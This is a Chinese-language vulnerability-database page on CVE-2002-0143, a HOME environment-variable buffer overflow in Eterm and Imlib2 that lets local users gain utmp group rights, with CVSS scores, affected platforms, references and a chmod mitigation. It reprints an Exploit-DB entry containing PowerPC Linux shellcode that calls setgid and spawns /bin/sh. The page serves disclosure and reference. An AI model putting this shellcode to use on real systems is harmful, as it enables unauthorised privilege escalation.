CVE-2002-0143
CVSS4.6
发布时间 :2002-03-25 00:00:00
修订时间 :2008-09-10 20:00:35
NMCOE    

[原文]Buffer overflow in Eterm of Enlightenment Imlib2 1.0.4 and earlier allows local users to execute arbitrary code via a long HOME environment variable.


[CNNVD]ETerm Home环境变量缓冲溢出漏洞(CNNVD-200203-088)

        
        Eterm是一个运行于Linux和Unix操作系统的免费、开放源码的终端模拟程序。它由Michael Jennings维护。
        Eterm在处理HOME环境变量时存在一个缓冲溢出漏洞,允许本地用户获取sgid utmp属性。
        Eterm在大多数系统上是以setgid utmp的属性安装的。当将环境变量$HOME设置为4128个字节长的字符串时,执行Eterm将产生缓冲溢出。本地用户可以用覆盖返回地址的方法转而执行自己的代码,而且得到utmp组的权限。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:enlightenment:imlib:2.1.0.3
cpe:/a:enlightenment:imlib:2.1.0.2
cpe:/a:michael_jennings:eterm:0.9.1
cpe:/a:enlightenment:imlib:2.1.0.1
cpe:/a:enlightenment:imlib:2.1.0.4
cpe:/a:enlightenment:imlib:2.0.01.0.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0143
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0143
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200203-088
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/7896.php
(VENDOR_ADVISORY)  XF  eterm-home-bo(7896)
http://online.securityfocus.com/archive/1/251597
(VENDOR_ADVISORY)  BUGTRAQ  20020121 Re: Eterm SGID utmp Buffer Overflow (Local)
http://online.securityfocus.com/archive/1/250145
(VENDOR_ADVISORY)  BUGTRAQ  20020113 Eterm SGID utmp Buffer Overflow (Local)
http://www.securityfocus.com/bid/3868
(UNKNOWN)  BID  3868

- 漏洞信息

ETerm Home环境变量缓冲溢出漏洞
中危 边界条件错误
2002-03-25 00:00:00 2006-09-05 00:00:00
本地  
        
        Eterm是一个运行于Linux和Unix操作系统的免费、开放源码的终端模拟程序。它由Michael Jennings维护。
        Eterm在处理HOME环境变量时存在一个缓冲溢出漏洞,允许本地用户获取sgid utmp属性。
        Eterm在大多数系统上是以setgid utmp的属性安装的。当将环境变量$HOME设置为4128个字节长的字符串时,执行Eterm将产生缓冲溢出。本地用户可以用覆盖返回地址的方法转而执行自己的代码,而且得到utmp组的权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 去掉ETerm的sgid utmp属性。
         # chmod g-s Eterm
        厂商补丁:
        Eterm
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.eterm.org

- 漏洞信息 (21226)

IMLib2 Home Environment Variable Buffer Overflow Vulnerability (EDBID:21226)
linux local
2002-01-13 Verified
0 Charles Stevenson
N/A [点击下载]
source: http://www.securityfocus.com/bid/3868/info

Imlib2 is a freely available, open source graphics library available for the Linux and Unix operating systems. It is maintained by Michael Jennings.

Imlib2 is installed on many operating systems and linked with graphical programs such as Eterm. Some programs linked with the library are setuid, such as Eterm which is a setuid utmp program. In some cases, a buffer overflow in the $HOME environment variable may occurs, such as when the $HOME environment variable is filled with 4128 bytes and Eterm is executed. This can allow a local user to overwrite stack variables up through the return address, and execute arbitrary code. As the Eterm program is setgid utmp, this code would be executed with utmp privileges. 

/* execve.c
 *
 * PowerPC Linux Shellcode
 *
 * by Charles Stevenson <core@bokeoa.com>
 *
 * original execve by my good friend
 * Kevin Finisterre  <dotslash@snosoft.com>
 */

#include <stdio.h>

char shellcode[] =
/* setgid(43) utmp */
        "\x38\x60\x01\x37"              /* 100004a0: li
r3,311             */
        "\x38\x63\xfe\xf4"              /* 100004a4: addi
r3,r3,-268         */
        "\x3b\xc0\x01\x70"              /* 100004a8: li
r30,368            */
        "\x7f\xc0\x1e\x70"              /* 100004ac: srawi
r0,r30,3           */
        "\x44\xff\xff\x02"              /* 100004b0:
sc                         */
/* execve("/bin/sh") */
        "\x7c\xa5\x2a\x78"              /* 100004b0: xor
r5,r5,r5        */
        "\x40\x82\xff\xed"              /* 100004b4: bnel+      100004a0
<main> */
        "\x7f\xe8\x02\xa6"              /* 100004b8: mflr
r31             */
        "\x3b\xff\x01\x30"              /* 100004bc: addi
r31,r31,304     */
        "\x38\x7f\xfe\xf4"              /* 100004c0: addi
r3,r31,-268     */
        "\x90\x61\xff\xf8"              /* 100004c4: stw
r3,-8(r1)       */
        "\x90\xa1\xff\xfc"              /* 100004c8: stw
r5,-4(r1)       */
        "\x38\x81\xff\xf8"              /* 100004cc: addi
r4,r1,-8        */
        "\x3b\xc0\x01\x60"              /* 100004d0: li
r30,352         */
        "\x7f\xc0\x2e\x70"              /* 100004d4: srawi
r0,r30,5        */
        "\x44\xff\xff\x02"              /* 100004d8:
sc                         */
        "\x2f\x62\x69\x6e"              /* 100004dc: cmpdi
cr6,r2,26990    */
        "\x2f\x73\x68\x00";             /* 100004e0: cmpdi
cr6,r19,26624   */

int main(int argc, char **argv) {
   fprintf(stderr,"sizeof(shellcode)=%d\n",sizeof(shellcode));
   //__asm__("b shellcode");
   printf("%s",shellcode);
   return 0;
}
		

- 漏洞信息

2023
Eterm Home Environment Variable Character String Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- 漏洞描述

- 时间线

2002-01-13 Unknow
2002-01-13 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站